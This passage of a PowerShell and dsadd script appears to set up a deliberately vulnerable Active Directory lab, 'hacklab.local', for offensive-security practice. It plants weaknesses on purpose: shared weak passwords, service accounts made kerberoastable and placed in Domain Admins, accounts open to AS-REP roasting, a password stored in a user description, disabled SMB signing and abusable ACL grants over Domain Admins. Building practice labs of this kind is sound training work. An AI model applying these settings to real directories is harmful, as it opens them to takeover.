ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 371 | dsadd user "cn=o.zelly, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 372 | dsadd user "cn=p.zinc, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 373 | dsadd user "cn=q.zouch, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 374 | 375 | # Head_Office / Help_Desk 376 | 377 | dsadd user "cn=a.adams, ou=Help_Desk, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 378 | dsadd user "cn=b.allen, ou=Help_Desk, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 379 | dsadd user "cn=c.armstrong, ou=Help_Desk, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 380 | 381 | # Admins / IT / DA 382 | 383 | dsadd user "cn=adm.adams, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 384 | dsadd user "cn=adm.smith, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 385 | dsadd user "cn=adm.stewart, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 386 | dsadd user "cn=adm.natt, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 387 | dsadd user "cn=adm.nelson, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 388 | 389 | # Service Accounts / IT 390 | 391 | dsadd user "cn=svc_afds, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 392 | dsadd user "cn=svc_test, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 393 | dsadd user "cn=svc_mssql1, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 394 | dsadd user "cn=svc_mssql2, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 395 | dsadd user "cn=svc_lab, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 396 | dsadd user "cn=svc_admin, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local" 397 | 398 | # Set up Service Principal Name (SPN) for the following accounts so you can kerberoast them. 399 | 400 | setspn -s http/server1.hacklab.local:8082 svc_afds 401 | setspn -s http/server1.hacklab.local:8083 svc_test 402 | setspn -s http/server1.hacklab.local:8084 svc_mssql1 403 | setspn -s http/server1.hacklab.local:8085 svc_mssql2 404 | setspn -s http/server1.hacklab.local:8086 svc_lab 405 | setspn -s http/server1.hacklab.local:8087 svc_admin 406 | 407 | # Make the following accounts vulnerable to asreproast. 408 | 409 | Set-ADAccountControl -Identity m.jenkins -DoesNotRequirePreAuth 1 410 | Set-ADAccountControl -Identity z.mcdonald -DoesNotRequirePreAuth 1 411 | Set-ADAccountControl -Identity u.lewis -DoesNotRequirePreAuth 1 412 | 413 | # Create a description filed with a password in it. 414 | 415 | Set-ADUser d.atkinson -Description "User Password Summer123" 416 | 417 | # Disable SMB Signing on the DC. 418 | 419 | Set-SmbClientConfiguration -RequireSecuritySignature 0 -EnableSecuritySignature 0 -Confirm -Force 420 | 421 | # Add Domain Machines 422 | 423 | New-ADComputer -Name "SR2000-1" -SamAccountName "SR2000-1" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4" 424 | New-ADComputer -Name "SR2000-2" -SamAccountName "SR2000-2" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4" 425 | New-ADComputer -Name "SR2000-3" -SamAccountName "SR2000-3" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4" 426 | New-ADComputer -Name "SR2000-4" -SamAccountName "SR2000-4" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4" 427 | New-ADComputer -Name "SR2000-5" -SamAccountName "SR2000-5" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4" 428 | New-ADComputer -Name "SR2000-6" -SamAccountName "SR2000-6" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4" 429 | New-ADComputer -Name "SR2003-1" -SamAccountName "SR2003-1" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2" 430 | New-ADComputer -Name "SR2003-2" -SamAccountName "SR2003-2" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2" 431 | New-ADComputer -Name "SR2003-3" -SamAccountName "SR2003-3" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2" 432 | New-ADComputer -Name "SR2003-4" -SamAccountName "SR2003-4" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2" 433 | New-ADComputer -Name "SR2003-5" -SamAccountName "SR2003-5" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2" 434 | New-ADComputer -Name "SR2003-6" -SamAccountName "SR2003-6" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2" 435 | New-ADComputer -Name "SR2008-1" -SamAccountName "SR208-1" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1" 436 | New-ADComputer -Name "SR2008-2" -SamAccountName "SR208-2" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1" 437 | New-ADComputer -Name "SR2008-3" -SamAccountName "SR208-3" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1" 438 | New-ADComputer -Name "SR2008-4" -SamAccountName "SR208-4" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1" 439 | New-ADComputer -Name "SR2008-5" -SamAccountName "SR208-5" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1" 440 | New-ADComputer -Name "SR2008-6" -SamAccountName "SR208-6" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1" 441 | New-ADComputer -Name "SR2012-1" -SamAccountName "SR2012-1" -Enabled $True -OperatingSystem "Windows Server 2012 Standard" 442 | New-ADComputer -Name "SR2012-2" -SamAccountName "SR2012-2" -Enabled $True -OperatingSystem "Windows Server 2012 Standard" 443 | New-ADComputer -Name "SR2012-3" -SamAccountName "SR2012-3" -Enabled $True -OperatingSystem "Windows Server 2012 Standard" 444 | New-ADComputer -Name "SR2012-4" -SamAccountName "SR2012-4" -Enabled $True -OperatingSystem "Windows Server 2012 Standard" 445 | New-ADComputer -Name "SR2019-1" -SamAccountName "SR2019-1" -Enabled $True -OperatingSystem "Windows Server 2019 Standard" 446 | New-ADComputer -Name "SR2019-2" -SamAccountName "SR2019-2" -Enabled $True -OperatingSystem "Windows Server 2019 Standard" 447 | New-ADComputer -Name "SR2019-3" -SamAccountName "SR2019-3" -Enabled $True -OperatingSystem "Windows Server 2019 Standard" 448 | New-ADComputer -Name "SR2019-4" -SamAccountName "SR2019-4" -Enabled $True -OperatingSystem "Windows Server 2019 Standard" 449 | New-ADComputer -Name "W7-1" -SamAccountName "W7-1" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1" 450 | New-ADComputer -Name "W7-2" -SamAccountName "W7-2" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1" 451 | New-ADComputer -Name "W7-3" -SamAccountName "W7-3" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1" 452 | New-ADComputer -Name "W7-4" -SamAccountName "W7-4" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1" 453 | New-ADComputer -Name "W7-5" -SamAccountName "W7-5" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1" 454 | New-ADComputer -Name "W7-6" -SamAccountName "W7-6" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1" 455 | New-ADComputer -Name "XP-1" -SamAccountName "XP-1" -Enabled $True -OperatingSystem "Windows XP Service Pack 1" 456 | 457 | # Set UP ACL's 458 | 459 | Import-Module ActiveDirectory 460 | Set-Location AD: 461 | 462 | Function SetAcl($for, $to, $right, $inheritance) 463 | { 464 | $forSID = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser $for).SID 465 | $objOU = ($to).DistinguishedName 466 | $objAcl = get-acl $objOU 467 | # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-5.0 468 | $adRight = [System.DirectoryServices.ActiveDirectoryRights] $right # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-5.0 469 | $type = [System.Security.AccessControl.AccessControlType] "Allow" # https://docs.microsoft.com/fr-fr/dotnet/api/system.security.accesscontrol.accesscontroltype?view=dotnet-plat-ext-5.0 470 | $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] $inheritance # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=dotnet-plat-ext-5.0 471 | $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $forSID,$adRight,$type,$inheritanceType 472 | $objAcl.AddAccessRule($ace) 473 | Set-Acl -AclObject $objAcl -path $objOU 474 | } 475 | 476 | 477 | Function SetAclExtended($for, $to, $right, $extendedRightGUID, $inheritance) 478 | { 479 | $forSID = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser $for).SID 480 | $objOU = ($to).DistinguishedName 481 | $objAcl = get-acl $objOU 482 | # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-5.0 483 | $adRight = [System.DirectoryServices.ActiveDirectoryRights] $right # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-5.0 484 | $type = [System.Security.AccessControl.AccessControlType] "Allow" # https://docs.microsoft.com/fr-fr/dotnet/api/system.security.accesscontrol.accesscontroltype?view=dotnet-plat-ext-5.0 485 | $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] $inheritance # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=dotnet-plat-ext-5.0 486 | 487 | $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $forSID,$adRight,$type,$extendedRightGUID,$inheritanceType 488 | $objAcl.AddAccessRule($ace) 489 | Set-Acl -AclObject $objAcl -path $objOU 490 | } 491 | 492 | ## acl values : 493 | # AccessSystemSecurity 494 | # CreateChild 495 | # Delete 496 | # DeleteChild 497 | # DeleteTree 498 | # ExtendedRight 499 | # GenericAll 500 | # GenericExecute 501 | # GenericRead 502 | # GenericWrite 503 | # ListChildren 504 | # ListObject 505 | # ReadControl 506 | # ReadProperty 507 | # Self 508 | # Synchronize 509 | # WriteDacl 510 | # WriteOwner 511 | # WriteProperty 512 | 513 | ## extend rights 514 | # "00299570-246d-11d0-a768-00aa006e0529" {$right = "User-Force-Change-Password"} 515 | # "45ec5156-db7e-47bb-b53f-dbeb2d03c40" {$right = "Reanimate-Tombstones"} 516 | # "bf9679c0-0de6-11d0-a285-00aa003049e2" {$right = "Self-Membership"} 517 | # "ba33815a-4f93-4c76-87f3-57574bff8109" {$right = "Manage-SID-History"} 518 | # "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" {$right = "DS-Replication-Get-Changes-All"} 519 | 520 | # ACL abuse scenarios 521 | # https://sensepost.com/blog/2020/ace-to-rce/ 522 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces 523 | # https://adsecurity.org/?p=3658 524 | 525 | 526 | # genericall-on-user1 527 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-on-user 528 | 529 | SetAcl (Get-ADUser "n.collins") (Get-ADUser "a.adams") "GenericAll" "None" 530 | 531 | # genericall-on-group 532 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-on-group 533 | 534 | SetAcl (Get-ADUser "o.davidson") (Get-ADGroup "Domain Admins") "GenericAll" "None" 535 | 536 | # genericall-genericwrite-write-on-computer 537 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-genericwrite-write-on-computer 538 | 539 | SetAcl (Get-ADUser "g.white") (Get-ADComputer "W7-4$") "WriteProperty" "All" 540 | 541 | # writeproperty-on-group 542 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#writeproperty-on-group 543 | 544 | SetAcl (Get-ADUser "q.kennedy") (Get-ADGroup "Domain Admins") "WriteProperty" "All" 545 | 546 | # self-self-membership-on-group 547 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#self-self-membership-on-group 548 | 549 | SetAclExtended (Get-ADUser "u.roberts") (Get-ADGroup "Domain Admins") "Self" "bf9679c0-0de6-11d0-a285-00aa003049e2" "None" 550 | 551 | # writeproperty-self-membership 552 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#writeproperty-self-membership 553 | 554 | SetAclExtended (Get-ADUser "f.west") (Get-ADGroup "Domain Admins") "WriteProperty" "bf9679c0-0de6-11d0-a285-00aa003049e2" "All" 555 | 556 | # forcechangepassword 557 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#forcechangepassword 558 | # https://docs.microsoft.com/fr-fr/windows/win32/adschema/r-user-change-password 559 | 560 | SetAclExtended (Get-ADUser "l.james") (Get-ADUser "y.fox") "ExtendedRight" "00299570-246d-11d0-a768-00aa006e0529" "None" 561 | 562 | # write owner on group 563 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#writeowner-on-group 564 | 565 | SetAcl (Get-ADUser "a.graham") (Get-ADGroup "Domain Admins") "WriteOwner" "None" 566 | 567 | # genericwrite-on-user 568 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericwrite-on-user 569 | 570 | SetAcl (Get-ADUser "c.nelson") (Get-ADUser "w.marshall") "GenericWrite" "None" 571 | 572 | # writedacl-writeowner 573 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#writedacl-writeowner 574 | 575 | SetAcl (Get-ADUser "p.kelly") (Get-ADGroup "RDP") "WriteDacl" "None" 576 | 577 | exit 578 | ``` 579 | 580 | 581 | --------------------------------------------------------------------------------